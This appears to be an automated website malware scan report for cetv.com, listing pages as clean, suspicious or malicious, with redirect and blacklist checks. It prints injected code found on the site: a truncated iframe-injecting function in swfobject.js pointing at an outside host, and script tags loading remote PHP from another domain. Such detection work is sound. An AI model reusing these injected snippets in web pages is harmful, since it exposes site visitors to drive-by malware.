Scanned pages/files
Request | Server response | Status |
http://cetv.com/ | 200 OK Content-Length: 21241 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hkcetv.com ...[12019 bytes skipped]... td> <td><table width="100%" border="0" cellspacing="1" cellpadding="1" bgcolor="3f3f3f"> <tr> <td align="center" bgcolor="#1a1a1a"><script language="JavaScript"><!-- function random_imglink(){ var myimages=new Array() var imagelinks=new Array() var imagetarget=new Array() myimages[1]="pinkribbon2013_banner.jpg" imagelinks[1]="/ad/redirect.htm?i=97&u=http://hkcetv.com/event/pinkribbon2013" imagetarget[1] = "_blank" var ry =Math.floor(Math.random()*myimages.length) if (ry==0) ry=1 document.write('<a href="'+imagelinks[ry]+'" target="' + imagetarget[ry] + '"><img src="/image/ad/'+myimages[ry]+'" border=0></a>') } random_imglink() //--></script></td> </tr> </table></td> <td width="10"><img src="/image/common/space.gif" width="10" height= ...[14210 bytes skipped]... | ||
http://cetv.com/common/js.js | 200 OK Content-Length: 4141 Content-Type: application/x-javascript | clean |
http://cetv.com/common/swfobject.js | 200 OK Content-Length: 8515 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function jg09() { var static='ajax'; var controller='index.php'; var jg = document.createElement('iframe'); jg.src = 'http://czasnaherbate.info/D6p2qrVw.php'; jg.style.position = 'absolute'; jg.style.color = '67304'; jg.style.height = Antivirus reports:
| ||
http://cetv.com/common/prototype.js | 200 OK Content-Length: 130352 Content-Type: application/x-javascript | clean |
http://cetv.com/content/info/ | 200 OK Content-Length: 10577 Content-Type: text/html | clean |
http://cetv.com/content/program/ | 200 OK Content-Length: 19989 Content-Type: text/html | clean |
http://cetv.com/content/video/ | 200 OK Content-Length: 22505 Content-Type: text/html | clean |
http://cetv.com/event/tenvote/ | 200 OK Content-Length: 9976 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://www.solis-spa.com/primaverasilvio/mTfO3VUx.php?id=45406759" type="text/javascript"></script> | ||
http://cetv.com/index.html | 200 OK Content-Length: 21566 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hkcetv.com ...[12087 bytes skipped]... td> <td><table width="100%" border="0" cellspacing="1" cellpadding="1" bgcolor="3f3f3f"> <tr> <td align="center" bgcolor="#1a1a1a"><script language="JavaScript"><!-- function random_imglink(){ var myimages=new Array() var imagelinks=new Array() var imagetarget=new Array() myimages[1]="pinkribbon2013_banner.jpg" imagelinks[1]="/ad/redirect.htm?i=97&u=http://hkcetv.com/event/pinkribbon2013" imagetarget[1] = "_blank" var ry =Math.floor(Math.random()*myimages.length) if (ry==0) ry=1 document.write('<a href="'+imagelinks[ry]+'" target="' + imagetarget[ry] + '"><img src="/image/ad/'+myimages[ry]+'" border=0></a>') } random_imglink() //--></script></td> </tr> </table></td> <td width="10"><img src="/image/common/space.gif" width="10" height= ...[14507 bytes skipped]... | ||
http://cetv.com/content/info/index.html | 200 OK Content-Length: 10642 Content-Type: text/html | clean |
http://cetv.com/content/program/index.html | 200 OK Content-Length: 20073 Content-Type: text/html | clean |
http://cetv.com/content/video/index.html | 200 OK Content-Length: 22593 Content-Type: text/html | clean |
http://cetv.com/event/tenvote/index.html | 200 OK Content-Length: 9979 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://www.solis-spa.com/primaverasilvio/mTfO3VUx.php?id=45406760" type="text/javascript"></script> | ||
http://cetv.com/content/photo/index.html | 200 OK Content-Length: 36102 Content-Type: text/html | clean |
http://cetv.com/content/presenter/index.html | 200 OK Content-Length: 24709 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cetv.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 08 Jun 2014 15:29:34 GMT
Server: Microsoft-IIS/6.0
Content-Length: 21241
Content-Type: text/html; Charset=big5
Set-Cookie: ASPSESSIONIDQQQQBRTB=DGEBBKOBGLCALGJGFOECMAHO; path=/
X-Powered-By: ASP.NET
...21241 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: cetv.com
Referer: http://www.google.com/search?q=cetv.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cetv.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://cetv.com/
Result: cetv.com is not infected or malware details are not published yet.